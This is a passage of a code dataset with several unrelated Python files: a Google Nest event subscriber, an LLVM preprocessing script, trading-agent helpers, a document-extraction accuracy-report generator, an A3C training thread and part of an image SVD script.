callback)\n\n\nclass GoogleNestSubscriber:\n \"\"\"Subscribes to events from the Google Nest feed.\"\"\"\n\n def __init__(\n self,\n auth: AbstractAuth,\n project_id: str,\n subscriber_id: str,\n subscriber_factory: AbstractSusbcriberFactory = DefaultSubscriberFactory(),\n watchdog_delay: float = 10,\n ):\n \"\"\"Initialize the subscriber for the specified topic\"\"\"\n self._auth = auth\n self._subscriber_id = subscriber_id\n self._api = GoogleNestAPI(auth, project_id)\n self._subscriber_factory = subscriber_factory\n self._subscriber_future = None\n self._callback = None\n self._device_manager_task = asyncio.create_task(\n self._async_create_device_manager()\n )\n self._watchdog_delay = watchdog_delay\n if self._watchdog_delay > 0:\n self._watchdog_task = asyncio.create_task(self._watchdog())\n else:\n self._watchdog_task = None\n\n def set_update_callback(self, callback: EventCallback):\n \"\"\"Register a callback invoked when new messages are received.\"\"\"\n self._callback = callback\n\n async def start_async(self):\n \"\"\"Starts the subscriber.\"\"\"\n creds = await self._auth.async_get_creds()\n self._subscriber_future = await self._subscriber_factory.new_subscriber(\n creds, self._subscriber_id, self._subscribe_callback\n )\n\n async def _watchdog(self):\n \"\"\"Background task that watches the subscriber and restarts it.\"\"\"\n _LOGGER.debug(\"Starting background watchdog thread\")\n while True:\n if self._subscriber_future and self._subscriber_future.done():\n _LOGGER.debug(\"Subscriber shut down; restarting\")\n await self.start_async()\n await asyncio.sleep(self._watchdog_delay)\n\n def wait(self):\n \"\"\"Blocks on the subscriber.\"\"\"\n self._subscriber_future.result()\n\n def stop_async(self):\n \"\"\"Tells the subscriber to start shutting down.\"\"\"\n if self._watchdog_task:\n self._watchdog_task.cancel()\n if self._subscriber_future:\n self._subscriber_future.cancel()\n\n async def async_get_device_manager(self) -> DeviceManager:\n \"\"\"Return the DeviceManger with the current state of devices.\"\"\"\n return await self._device_manager_task\n\n async def _async_create_device_manager(self):\n \"\"\"Creates a DeviceManager, populated with initial state.\"\"\"\n device_manager = DeviceManager()\n structures = await self._api.async_get_structures()\n for structure in structures:\n device_manager.add_structure(structure)\n # Subscriber starts after a device fetch\n devices = await self._api.async_get_devices()\n for device in devices:\n device_manager.add_device(device)\n return device_manager\n\n def _subscribe_callback(self, message: pubsub_v1.subscriber.message.Message):\n payload = json.loads(bytes.decode(message.data))\n event = EventMessage(payload, self._auth)\n # Only accept device events once the Device Manager has been loaded.\n # We are ok with missing messages on startup since the device manager will\n # do a live read.\n if self._device_manager_task.done():\n self._device_manager_task.result().handle_event(event)\n if self._callback:\n self._callback.handle_event(event)\n message.ack()\n","sub_path":"google_nest_sdm/google_nest_subscriber.py","file_name":"google_nest_subscriber.py","file_ext":"py","file_size_in_byte":4568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"216504128","text":"from __future__ import print_function\nimport os, fnmatch, datetime, sys, re, glob\nimport helper as helper\n\ntop = sys.argv[1]\n\nbuff = []\nftemp=helper.fileOpen(\"../env.tcl\")\nfor line in ftemp:\n if \"#\" in line:\n buff.append(line[0:line.find(\"#\")])\n else:\n buff.append(line)\nftemp.close()\nfor line in buff:\n if \"DSS=\" in line:\n dss = helper.findPath(line, buff).replace(\"\\n\",\"\")\n print(\"DSS=\"+dss)\n if \"CLANG=\" in line:\n clang = helper.findPath(line, buff).replace(\"\\n\",\"\")\n print(\"CLANG=\"+clang)\n if \"VHLS=\" in line:\n vhls = helper.findPath(line, buff).replace(\"\\n\",\"\")\n print(\"VHLS=\"+vhls)\n if \"OPT=\" in line:\n opt = helper.findPath(line, buff).replace(\"\\n\",\"\")\n print(\"OPT=\"+opt)\n if \"DHLS=\" in line:\n dhls = helper.findPath(line, buff).replace(\"\\n\",\"\")\n print(\"DHLS=\"+dhls)\nftemp.close()\n\nfT = glob.glob(top+'/src/*.cpp')\nnL = \"\"\nfor n in fT:\n\tline = n[n.rfind(\"/\")+1:n.find(\".cpp\")]\n\tif line == top:\n\t\tos.system(clang+\" -Xclang -disable-O0-optnone -emit-llvm -S -c \"+n+\" -o \"+top+\"/_build/ds/\"+line+\"_.ll\")\n\t\tnL = nL + \" \"+top+\"/_build/ds/\"+line+\"_.ll\"\n\telse:\n\t\tos.system(clang+\" -Xclang -disable-O0-optnone -emit-llvm -S -c \"+n+\" -o \"+top+\"/_build/ds/\"+line+\".ll\")\n\t\tnL = nL + \" \"+top+\"/_build/ds/\"+line+\".ll\"\n#os.system(\"llvm-link -S -v -o \"+top+\".ll *.ll\")\n\n","sub_path":"src/preprocess_ds.py","file_name":"preprocess_ds.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"209893533","text":"from collections import deque\nimport numpy as np\n\nclass AgentCore():\n def __init__(self, hold=10):\n self.bid = None\n self.ask = None\n self.mid = None\n self.spread = None\n self.change = {'bid':None, 'ask':None, 'mid':None, 'spread':None}\n \n self.order_length = 0\n self.diff = None\n self.order_dir = None\n \n self.hold = hold\n \n def check_hold(self, tick):\n if tick < self.hold:\n return True ## (In hold period)\n else:\n return False\n \n def update_bid_ask_mid_spread(self, bid, ask, modify_change=False):\n mid = (ask + bid)/2\n spread = ask - bid\n if modify_change and (self.bid != None):\n self.update_change(bid, ask, mid, spread)\n self.bid, self.ask = bid, ask \n self.mid = mid\n self.spread = spread\n return\n \n \n def update_change(self,bid, ask, mid, spread):\n self.change['bid'] = bid - self.bid\n self.change['ask'] = ask - self.ask\n self.change['mid'] = mid - self.mid\n self.change['spread'] = spread - self.spread\n \n \n def update_order(self, order):\n assert order ## ensures an order is open therefore a diff is valid\n self.order_length += 1\n self.diff = self.get_diff(order)\n self.order_dir = self.get_order_dir(order)\n return\n \n \n def reset_order(self):\n self.order_length = 0\n self.diff = None\n self.order_dif = None\n \n \n def get_order_dir(self, order):\n return 1 if order.type == \"buy\" else -1\n \n \n def get_diff(self, order):\n if order.type ==\"buy\":\n diff = self.bid - order.price\n else:\n diff = order.price - self.ask\n return diff\n \n\n def print_status(self, orders):\n if orders:\n print(\"Mid: {: .5f} | Change: {: .5f} | Spread: {: .5f}\\nDiff: {: .5f} | Length: {}\"\n .format(self.mid, self.change['ask'], self.spread,\n self.diff, self.order_length))\n else:\n print(f\"Mid: {self.mid: .5f} | Spread: {self.spread: .5f}\")\n \n\n \nclass Buffer():\n def __init__(self, buffer_length=100, step=1, rnn_input=False):\n self.buffer_length = buffer_length\n self.step = step\n self.rnn_input = rnn_input\n self.buffer = deque(maxlen=self.buffer_length)\n \n if self.rnn_input:\n self.rnn_input_template = self._get_rnn_in_template()\n pass\n \n \n def append(self, val):\n self.buffer.append(val)\n \n \n def get_array(self):\n \"\"\" Returns np.array from the deque \"\"\"\n return np.array(self.buffer)\n \n \n def get_mean(self):\n arr = self.get_array()\n return np.mean(arr)\n \n \n def get_vals_at_steps_reversed(self):\n \"\"\" Returns array with data at every step.\n Starts from end (most recent deque input) \"\"\"\n arr = self.get_array()\n return arr[::-self.step]\n \n \n def get_diff_array(self, arr):\n \"\"\" Returns array of differences between steps \"\"\"\n return np.diff(arr)\n \n \n def _copy_into_template(self, arr):\n \"\"\" From template, copies values in for rnn input \"\"\"\n copy = self.rnn_input_template\n copy[-len(arr):] = arr[:]\n return copy\n \n \n def get_rnn_input(self):\n assert self.rnn_input ## Buffer not initialised with rnn_input\n arr = self.get_vals_at_steps_reversed()\n diff_arr = self.get_diff_array(arr)\n if diff_arr.shape[0] is 0:\n return self.rnn_input_template\n ## Catches beginning if not enough input is given, possibly too short a hold period\n return self._copy_into_template(diff_arr)\n \n \n def _get_rnn_in_template(self):\n return np.zeros(self.buffer_length)[::-self.step]\n \n ","sub_path":"src/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"65802250","text":"from typing import Optional\nfrom config import subType, host, username, password, resourceURL, webSocketSessionId, upload_json, uploadURL, \\\n accepted_formats, folder_to_process\nfrom xlsxwriter.utility import xl_range, xl_rowcol_to_cell\nfrom xlsxwriter.worksheet import (\n Worksheet, cell_number_tuple, cell_string_tuple)\nimport requests\nimport json\nimport os\nimport time\nimport pandas as pd\nimport datetime\nimport xlsxwriter\n\n\n# ---- Uploading documents to iMatch and get extracted data points ----\ndef authenticate(auth_url, auth_username, auth_password):\n \"\"\"\n Authenticate to iMatch\n :param auth_url: Host URL\n :param auth_username: Configured in config.py\n :param auth_password: auth_username: Configured in config.py\n :return: Bearer Token if successful authentication. Or else Boolean False.\n \"\"\"\n auth_url = auth_url + \"/api/authenticate\"\n payload = \"\"\n\n headers = {\n 'Content-Type': \"application/json\",\n 'username': auth_username,\n 'password': auth_password,\n 'Accept': \"*/*\",\n 'Accept-Encoding': \"gzip, deflate\",\n 'Content-Length': \"0\",\n 'Connection': \"keep-alive\",\n 'cache-control': \"no-cache\"\n }\n\n return_value = False\n\n try:\n authenticate_tries_counter = 0\n while authenticate_tries_counter < 5:\n authenticate_tries_counter = authenticate_tries_counter + 1\n response = requests.request(\"POST\", auth_url, data=payload, headers=headers)\n if response.status_code == 200:\n return_value = json.loads(response.content)['id_token']\n authenticate_tries_counter = authenticate_tries_counter + 6\n else:\n time.sleep(3)\n except ConnectionError:\n pass\n\n return return_value\n\n\nif authenticate(auth_url=host, auth_username=username, auth_password=password):\n authorization_token = \"Bearer \" + authenticate(auth_url=host, auth_username=username, auth_password=password)\nelse:\n authorization_token = False\n\n\ndef get_processed_file_data(file_id, resource_url=resourceURL):\n \"\"\"\n :param file_id: File ID\n :param resource_url: iMatch Resource URL\n :return: returns file response\n \"\"\"\n headers = {'Authorization': authorization_token}\n resource_url = resource_url + file_id\n print(\"File is in Pipeline\")\n while True:\n time.sleep(1)\n file_response = requests.get(resource_url, headers=headers)\n if file_response.json()['textPlain'] is not None:\n break\n\n print(\"File is processed\")\n return file_response.json()\n\n\ndef upload_file(file):\n \"\"\"\n :param file: file id from iMatch\n :return:\n \"\"\"\n if authorization_token:\n headers = {'Authorization': authorization_token}\n\n files = {\n 'file': file,\n 'webSocketSessionId': webSocketSessionId,\n 'json': upload_json,\n }\n response = requests.post(uploadURL, headers=headers, files=files)\n\n return response.content\n else:\n print(\"Authentication Failed\")\n return False\n\n\n# Get first file and store the data\ndef get_data_labels(file_dir):\n image_test = open(file_dir, 'rb')\n upload_response = upload_file(image_test)\n print(json.loads(upload_response))\n counter = 0\n while \"error\" in json.loads(upload_response):\n print(\"Retrying\")\n time.sleep(1)\n counter = counter + 1\n upload_response = upload_file(image_test)\n if counter > 5:\n upload_response = False\n print(\"Retired 5 times. Skipping the file for now\")\n break\n\n file_id = json.loads(upload_response)['identifier']\n file_data = get_processed_file_data(file_id, resourceURL)\n list_of_datapoint_names = ['file_name', 'imatch_id']\n\n data = file_data['sections'][0]['attributes']\n for j in range(len(data)):\n list_of_datapoint_names.append(data[j]['key'])\n\n for keys in file_data['sections'][0]:\n if keys == \"children\":\n data = file_data['sections'][0][keys]\n for i in range(len(data)):\n attributes = data[i]['attributes']\n for j in range(len(attributes)):\n list_of_datapoint_names.append(attributes[j]['key'])\n\n return {datapoint_name: None for datapoint_name in list_of_datapoint_names}\n\n\ndef process_folder(path):\n \"\"\"\n :param path: Process the folder\n :return: None\n \"\"\"\n os.chdir(path)\n os.makedirs(os.getcwd() + '/html_output', exist_ok=True)\n completed = ['.'.join(i.split('.')[:-1]) for i in os.listdir(os.getcwd() + '/html_output')]\n images = [im for im in os.listdir() if im.split('.')[-1] in accepted_formats]\n\n if images:\n first_file = images[0]\n file_path = os.getcwd() + '/' + first_file\n data_dict_template = get_data_labels(file_path)\n file_info = pd.DataFrame(columns=[keys for keys in data_dict_template.keys()])\n number_of_images = 0\n\n for image in images:\n number_of_images = number_of_images + 1\n if '.'.join(image.split('.')[:-1]) in completed:\n print('Skipped', image)\n continue\n else:\n print(\"Processing the {}\".format(image))\n image_bin = open(image, 'rb')\n upload_response = upload_file(image_bin)\n\n counter = 0\n while \"error\" in json.loads(upload_response):\n print(\"Retrying\")\n counter = counter + 1\n upload_response = upload_file(image)\n if counter > 5:\n upload_response = False\n print(\"Retired 5 times. Skipping the file for now\")\n break\n\n if upload_response:\n file_id = json.loads(upload_response)['identifier']\n file_data = get_processed_file_data(file_id, resourceURL)\n with open(os.getcwd() + '/html_output/'\n + '.'.join(image.split('.')[:-1]) + '.html', 'w', encoding='utf-8') as f:\n f.write(file_data['textPlain']['ENGLISH'])\n\n data_dict_template['file_name'] = file_data['information']['fileName']\n data_dict_template['imatch_id'] = file_data['id']\n data = file_data['sections'][0]['attributes']\n\n for j in range(len(data)):\n # this loop is used to obtain data point if the\n # data is not hidden under a drop down menu\n # in iMatch UI\n key = data[j]['key']\n value = data[j]['values'][0]['originalValue']\n data_dict_template[key] = value\n\n for keys in file_data['sections'][0]:\n # this loop is used to obtain data point if the\n # data is hidden under a drop down menu in\n # iMatch UI\n if keys == \"children\":\n data = file_data['sections'][0][keys]\n if len(data) != 0:\n # this conditional will run when there is\n # a data point with multiple data values\n for sub_key in data[0]:\n if sub_key == 'children':\n sub_data = data[0][sub_key]\n for index in range(len(sub_data)):\n sub_data_attributes = sub_data[index]['attributes']\n for j in range(len(sub_data_attributes)):\n key = sub_data_attributes[j]['key'] + '_' + str(index+1)\n if key not in file_info.columns.tolist():\n file_info[key] = \"\"\n value = sub_data_attributes[j]['values'][0]['originalValue']\n data_dict_template[key] = value\n\n for i in range(len(data)):\n attributes = data[i]['attributes']\n for j in range(len(attributes)):\n key = attributes[j]['key']\n value = attributes[j]['values'][0]['originalValue']\n data_dict_template[key] = value\n\n file_info.loc[number_of_images] = [values for values in data_dict_template.values()]\n # this loop will flush out the dictionary for every documents uploaded\n for key in data_dict_template.keys():\n data_dict_template[key] = \"\"\n\n d = datetime.datetime.today()\n now = '{0:0=2d}_{1:0=2d}_{2:0=4d}-{3:0=2d}_{4:0=2d}_{5:0=2d}'.format(d.month,\n d.day,\n d.year,\n d.hour,\n d.minute,\n d.second)\n\n out_file_name = now + \"_output.csv\"\n file_info.to_csv(out_file_name, index=False)\n file_info = file_info.drop(\"imatch_id\", axis=1)\n out_file_name = \"compare\" + out_file_name\n file_info.to_csv(out_file_name, index=False)\n print(\"All files are processed\")\n return out_file_name\n\n\nfile_name = process_folder(folder_to_process)\n\n# ----- Generating Accuracy Report -----\n# subType header strings\nsubtype_header = [\"Document Name\", \"Data Point Name\",\n \"Expect Data\", \"Extract Data\",\n \"Total\", \"Partial\",\n \"Noisy\", \"Correct\"]\n\n# Document accuracy header strings\ndoc_accuracy_header = [\"Document Name\", \"Total\",\n \"Partial\", \"Noisy\",\n \"Correct\", \"Accuracy % with Noise\",\n \"Accuracy % without Noise\", \"Accuracy % with Partial Correct\"]\n\n# Data point accuracy header strings\ndata_point_accuracy_header = [\"Data Point Name\", \"Total\",\n \"Partial\", \"Noisy\",\n \"Correct\", \"Accuracy % with Noise\",\n \"Accuracy % without Noise\", \"Accuracy % with Partial Correct\"]\n\n# File that will be used to generate accuracy report\nextracted_file_path = folder_to_process + file_name + \".csv\"\n\n# Read CSV files into data frames\ncompare_data = pd.read_csv(file_name, dtype=str)\n\n# Fill any missing values\ndf1 = compare_data.fillna(\"\")\n\n# Creating data points list\ndata_point_list = list(df1.columns)\ndata_point_list.pop(0)\n\n# Creating empty dictionary for each data points that will be used\n# for data point accuracy sheet\ntotal_dict = {}\npartial_dict = {}\nnoisy_dict = {}\ncorrect_dict = {}\n\n# Adding a key of each data points with value of an empty list that will be\n# filled with respective cells of the data points to all created dictionaries\nfor data_point in data_point_list:\n total_dict[data_point] = []\n partial_dict[data_point] = []\n noisy_dict[data_point] = []\n correct_dict[data_point] = []\n\n# --- Functions ---\n# Function to add cells to each data point list within each dictionaries\ndef add_cells_to_dict(dicts_list, dp_row_index, dp_column_index):\n dicts_list.append(xl_rowcol_to_cell(dp_row_index, dp_column_index))\n\n# Borrowed function from karolyi at Stackoverflow to get column width\ndef get_column_width(worksheet: Worksheet, column: int) -> Optional[int]:\n \"\"\"Get the max column width in a `Worksheet` column.\"\"\"\n strings = getattr(worksheet, '_ts_all_strings', None)\n if strings is None:\n strings = worksheet._ts_all_strings = sorted(\n worksheet.str_table.string_table,\n key=worksheet.str_table.string_table.__getitem__)\n lengths = set()\n for row_id, colums_dict in worksheet.table.items(): # type: int, dict\n data = colums_dict.get(column)\n if not data:\n continue\n if type(data) is cell_string_tuple:\n iter_length = len(strings[data.string])\n if not iter_length:\n continue\n lengths.add(iter_length)\n continue\n if type(data) is cell_number_tuple:\n iter_length = len(str(data.number))\n if not iter_length:\n continue\n lengths.add(iter_length)\n if not lengths:\n return None\n return max(lengths)\n\n# Borrowed function from karolyi at Stackoverflow to set column autowidth\ndef set_column_autowidth(worksheet: Worksheet, column: int):\n \"\"\"\n Set the width automatically on a column in the `Worksheet`.\n !!! Make sure you run this function AFTER having all cells filled in\n the worksheet!\n \"\"\"\n maxwidth = get_column_width(worksheet=worksheet, column=column)\n if maxwidth is None:\n return\n worksheet.set_column(first_col=column, last_col=column, width=(maxwidth * 1.3))\n# --- ---\n\n# Create a workbook and add a worksheet.\nsheet_name = subType + \"_Accuracy_Report.xlsx\"\nworkbook = xlsxwriter.Workbook(sheet_name)\nworksheet1 = workbook.add_worksheet(subType)\nworksheet2 = workbook.add_worksheet(\"Document Accuracy\")\nworksheet3 = workbook.add_worksheet(\"Data Point Accuracy\")\nworksheet_list = [worksheet1, worksheet2, worksheet3]\n\n# --- Formatting ---\nbold = workbook.add_format({'bold': True,\n 'bg_color': '#DDDDDD',\n 'border': 1,\n 'font_size': 14,\n 'align': 'center'})\n\n# Row and column index\nrow_index = 0\ncol_index = 0\n\n# Creating header for each worksheet\nfor worksheet in worksheet_list:\n if worksheet == worksheet1:\n for header in subtype_header:\n worksheet.write(0, col_index, header, bold)\n col_index += 1\n col_index = 0\n if worksheet == worksheet2:\n for header in doc_accuracy_header:\n worksheet.write(0, col_index, header, bold)\n col_index += 1\n col_index = 0\n if worksheet == worksheet3:\n for header in data_point_accuracy_header:\n worksheet.write(0, col_index, header, bold)\n col_index += 1\n col_index = 0\n\n# --- subType Sheet ---\ndoc_name_cell_list = []\ndp_count_cell_list = []\n\n# -- Writing all document name to column A --\nsubtype_doc_name_row_index = 1\nsubtype_doc_name_list = df1['file_name'].tolist()\ndata_point_len = len(data_point_list) + 1\n\nfor doc_name in subtype_doc_name_list:\n worksheet1.write(subtype_doc_name_row_index, 0, doc_name)\n doc_name_cell_list.append(xl_rowcol_to_cell(subtype_doc_name_row_index, 0))\n subtype_doc_name_row_index += data_point_len\n\n# -- Writing all data points to column B --\nsubtype_data_point_row_index = 2\nfor i in range(0, len(subtype_doc_name_list)):\n for data_point in data_point_list:\n worksheet1.write(subtype_data_point_row_index, 1, data_point)\n # Add cells of respective total, partial, correct, and\n # noisy to dictionary list\n total_list = total_dict[data_point]\n partial_list = partial_dict[data_point]\n correct_list = correct_dict[data_point]\n noisy_list = noisy_dict[data_point]\n add_cells_to_dict(total_list, subtype_data_point_row_index, 4)\n add_cells_to_dict(partial_list, subtype_data_point_row_index, 5)\n add_cells_to_dict(correct_list, subtype_data_point_row_index, 6)\n add_cells_to_dict(noisy_list, subtype_data_point_row_index, 7)\n subtype_data_point_row_index += 1\n subtype_data_point_row_index += 1\n\n# -- Writing all extracted data to column D --\nsubtype_extracted_data_row_index = 2\noutput_transpose = df1.drop(['file_name'], axis=1).T.rename_axis('Datapoint Name')\ncolumn_name = []\nfor i in range(0, len(output_transpose.columns)):\n column_name.append(str(i))\noutput_transpose.columns = column_name\nextracted_data_df = output_transpose\nfor name in column_name:\n extracted_data_list = extracted_data_df[name].tolist()\n for extracted_data in extracted_data_list:\n worksheet1.write(subtype_extracted_data_row_index, 3, extracted_data)\n subtype_extracted_data_row_index += 1\n subtype_extracted_data_row_index += 1\n\n# -- Writing all data points formula to column E, F, G, H --\nsubtype_formula_column_index_list = [4, 5, 6, 7]\ntemp_dict = {}\nfor i in subtype_formula_column_index_list:\n subtype_formula_row_index = 1\n range_start_index = 2\n temp_dict[i] = []\n temp_list = temp_dict[i]\n for j in range(0, len(subtype_doc_name_list)):\n range_end_index = range_start_index + len(data_point_list) - 1\n data_point_range = xl_range(range_start_index, i, range_end_index, i)\n worksheet1.write(subtype_formula_row_index, i, '=SUM(' + data_point_range + ')')\n temp_list.append(xl_rowcol_to_cell(subtype_formula_row_index, i))\n range_start_index += len(data_point_list) + 1\n subtype_formula_row_index += len(data_point_list) + 1\n dp_count_cell_list.append(temp_dict[i])\n\n# Set columns autowidth\nfor i, header in enumerate(subtype_header):\n set_column_autowidth(worksheet1, i)\n\n# --- Document Accuracy ---\n# -- Writing all document names to column A --\n# -- based on document name on subType sheet --\ndoc_accuracy_doc_name_row_index = 1\nfor doc in subtype_doc_name_list:\n worksheet2.write(doc_accuracy_doc_name_row_index, 0, doc)\n doc_accuracy_doc_name_row_index += 1\n\n# -- Writing all data point flags to column B, C, D, E --\ndp_count_column_index_list = [1, 2, 3, 4]\ntemp_dict = {}\nfor i in range(0, len(dp_count_column_index_list)):\n temp_dict[dp_count_column_index_list[i]] = dp_count_cell_list[i]\n\nfor i in dp_count_column_index_list:\n dp_count_row_index = 1\n for dp_count in temp_dict[i]:\n worksheet2.write(dp_count_row_index, i, '=' + subType + '!' + dp_count)\n dp_count_row_index += 1\n\n# -- Writing accuracy formula to column G, H, I --\ndef accuracy_score(work_sheet, cell_list):\n # Creating 0.00% cell format\n cell_format = workbook.add_format()\n cell_format.set_num_format(10)\n\n formula_row_index = 1\n for index in range(0, len(cell_list)):\n correct_cell = xl_rowcol_to_cell(formula_row_index, 4)\n noise_cell = xl_rowcol_to_cell(formula_row_index, 3)\n partial_cell = xl_rowcol_to_cell(formula_row_index, 2)\n total_cell = xl_rowcol_to_cell(formula_row_index, 1)\n work_sheet.write(formula_row_index, 5,\n '=' + correct_cell + '/' + total_cell, cell_format)\n work_sheet.write(formula_row_index, 6,\n '=' + correct_cell + '/(' + total_cell + '-' + noise_cell + ')',\n cell_format)\n work_sheet.write(formula_row_index, 7,\n '=(' + correct_cell + '+(' + partial_cell + '*0.5))/' + total_cell,\n cell_format)\n formula_row_index += 1\n\naccuracy_score(worksheet2, doc_name_cell_list)\n\n# Set columns autowidth\nfor i, header in enumerate(doc_accuracy_header):\n set_column_autowidth(worksheet2, i)\n\n# --- Document Accuracy ---\n# -- Writing all data points names to column A --\ndp_accuracy_dp_name_row_index = 1\nfor data_point in data_point_list:\n worksheet3.write(dp_accuracy_dp_name_row_index, 0, data_point)\n dp_accuracy_dp_name_row_index += 1\n\n# -- Writing the summation of each data points to column B, C, D, E\ndef summation_string(string_list):\n sum_string = '=SUM('\n for string in string_list:\n if string != string_list[-1]:\n sum_string += subType + '!' + string + ','\n else:\n sum_string += subType + '!' + string + ')'\n return sum_string\n\ndp_accuracy_row_index = 1\nfor data_point in data_point_list:\n dict_list = [total_dict[data_point], partial_dict[data_point], correct_dict[data_point], noisy_dict[data_point]]\n dp_accuracy_column_index_list = [1, 2, 3, 4]\n for column_index in dp_accuracy_column_index_list:\n\n worksheet3.write(dp_accuracy_row_index, column_index, summation_string(dict_list[(column_index - 1)]))\n dp_accuracy_row_index += 1\n\n# -- Writing accuracy formula to column G, H, I --\naccuracy_score(worksheet3, data_point_list)\n\n# Set columns autowidth\nfor i, header in enumerate(data_point_accuracy_header):\n set_column_autowidth(worksheet3, i)\n\nworkbook.close()\n","sub_path":"QA Automation/processFolder.py","file_name":"processFolder.py","file_ext":"py","file_size_in_byte":20719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"598075498","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\nimport numpy as np\nimport random\nimport time\nimport sys\nimport gym\n\nfrom game_state import GameState\nfrom game_network import GameACFFNetwork\n\nimport constants as Constants\n\nLOG_INTERVAL = 100\nPERFORMANCE_LOG_INTERVAL = 1000\n\nclass A3CTrainingThread(object):\n def __init__(self, env, threadIndex, global_network, initialLearningRate, learningRateInput,\n grad_applier, maxGlobalTimeStep, saveData, device):\n\n self.env = env\n self.saveData = saveData\n self.threadIndex = threadIndex\n self.learningRateInput = learningRateInput\n self.maxGlobalTimeStep = maxGlobalTimeStep\n self.local_network = GameACFFNetwork(Constants.ACTION_SIZE, device)\n\n self.local_network.prepare_loss(Constants.ENTROPY_BETA)\n with tf.device(device):\n # var_refs = [v.ref() for v in self.local_network.get_vars()]\n var_refs = self.local_network.get_vars()\n self.gradients = tf.gradients(self.local_network.total_loss, var_refs, gate_gradients=False,\n aggregation_method=None, colocate_gradients_with_ops=False)\n\n self.apply_gradients = grad_applier.apply_gradients(global_network.get_vars(), self.gradients)\n self.sync = self.local_network.sync_from(global_network)\n self.local_t = 0\n self.maxEpReward = 0\n self.prev_local_t = 0\n self.episodeReward = 0\n self.initialLearningRate = initialLearningRate\n\n def _anneal_learning_rate(self, globalTimeStep):\n return max(0, self.initialLearningRate * (self.maxGlobalTimeStep - globalTimeStep) / self.maxGlobalTimeStep)\n\n def choose_action(self, pi_values):\n return np.random.choice(range(len(pi_values)), p=pi_values)\n\n def _record_score(self, sess, summary_writer, summary_op, score_input, score, global_t, pi):\n summary_str = sess.run(summary_op, feed_dict={ score_input: score })\n summary_writer.add_summary(summary_str, global_t)\n summary_writer.flush()\n\n if self.threadIndex == 0:\n print('****** ADDING NEW SCORE ******')\n self.saveData.append(score, pi)\n if score > Constants.SAVE_SCORE_THRESHOLD:\n self.saveData.requestSave()\n\n def set_start_time(self, start_time):\n self.start_time = start_time\n\n def perfLog(self, global_t):\n if (self.threadIndex == 0) and (self.local_t - self.prev_local_t >= PERFORMANCE_LOG_INTERVAL):\n self.prev_local_t += PERFORMANCE_LOG_INTERVAL\n elapsedTime = time.time() - self.start_time\n stepsPerSec = global_t / elapsedTime\n print(\"### Performance : {} STEPS in {:.0f} sec. {:.0f} STEPS/sec. {:.2f}M STEPS/hour\".format(\n global_t, elapsedTime, stepsPerSec, stepsPerSec * 3600 / 1000000.))\n\n def process(self, sess, global_t, summary_writer, summary_op, score_input):\n #ohe - do these have to be self.states? or soemthing else?\n states = []\n actions = []\n rewards = []\n values = []\n\n terminal_end = False\n sess.run( self.sync )\n start_local_t = self.local_t\n\n # t_max times loop\n for i in range(Constants.LOCAL_T_MAX):\n pi_, value_ = self.local_network.run_policy_and_value(sess, self.game_state.S)\n action = self.choose_action(pi_)\n\n states.append(self.game_state.S)\n actions.append(action)\n values.append(value_)\n\n #change this to observe all the indices\n if (self.threadIndex == 0) and (self.local_t % LOG_INTERVAL == 0):\n print(\"pi={}\".format(pi_))\n print(\" V={}\".format(value_))\n\n # process game\n self.game_state.process(action)\n\n # receive game result\n reward = self.game_state.reward\n terminal = self.game_state.terminal\n\n self.episodeReward += reward\n\n #adding in early termination\n if self.episodeReward > self.maxEpReward:\n self.maxEpReward = self.episodeReward\n\n if self.maxEpReward - self.episodeReward > 5:\n terminal = True\n\n # clip reward\n rewards.append( np.clip(reward, -1, 1) )\n\n self.local_t += 1\n self.game_state.update()\n\n if terminal:\n terminal_end = True\n print(\"score={}\".format(self.episodeReward))\n\n self._record_score(sess, summary_writer, summary_op, score_input, self.episodeReward, global_t, pi_)\n\n self.maxEpReward = 0 #ohe\n self.episodeReward = 0\n\n self.game_state.reset()\n break\n\n R = 0.0 if terminal_end else self.local_network.run_value(sess, self.game_state.S)\n\n actions.reverse()\n states.reverse()\n rewards.reverse()\n values.reverse()\n\n batch_si = []\n batch_a = []\n batch_td = []\n batch_R = []\n\n # compute and accmulate gradients\n for (ai, ri, si, Vi) in zip(actions, rewards, states, values):\n R = ri + Constants.DISCOUNT * R\n td = R - Vi\n a = np.zeros([Constants.ACTION_SIZE])\n a[ai] = 1\n\n batch_si.append(si)\n batch_a.append(a)\n batch_td.append(td)\n batch_R.append(R)\n\n cur_learning_rate = self._anneal_learning_rate(global_t)\n sess.run( self.apply_gradients,\n feed_dict = {\n self.local_network.s: batch_si,\n self.local_network.a: batch_a,\n self.local_network.td: batch_td,\n self.local_network.r: batch_R,\n self.learningRateInput: cur_learning_rate} )\n\n self.perfLog(global_t)\n\n # return advanced local step size\n diff_local_t = self.local_t - start_local_t\n return diff_local_t\n\n","sub_path":"Scripts/oguzelibol-CarRacingA3C/a3c_thread.py","file_name":"a3c_thread.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"138429222","text":"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as mpimg\r\n#import cv2\r\nimport numpy as np\r\nimport matplotlib\r\nfrom scipy import linalg\r\nfrom PIL import Image\r\n\r\nmatplotlib.rcParams['backend'] = \"Qt4Agg\"\r\n\r\n\r\nimg=mpimg.imread('2_Picture.jpg')\r\n[r,g,b] = [img[:,:,i] for i in range(3)]\r\n\r\n\r\nfig = plt.figure(1)\r\nax1 = fig.add_subplot(3,2,1)\r\nax2 = fig.add_subplot(3,2,2)\r\nax3 = fig.add_subplot(3,2,3)\r\nax4 = fig.add_subplot(3,2,4)\r\nax1.imshow(img)\r\nax2.imshow(r, cmap = 'Reds')\r\nax3.imshow(g, cmap = 'Greens')\r\nax4.imshow(b, cmap = 'Blues')\r\n#plt.show()\r\n\r\n\r\n#This function is call to count number of NONE-ZERO in singular values of (M,N)\r\ndef countNotZero(numList):\r\n count = 0\r\n for num in numList:\r\n if num != 0:\r\n count +=1\r\n return count\r\n \r\ndef takeNotZero(numList,numTake):\r\n count = 0\r\n newList = []\r\n for num in numList:\r\n if(count Upload video entry-> Go to add new quiz 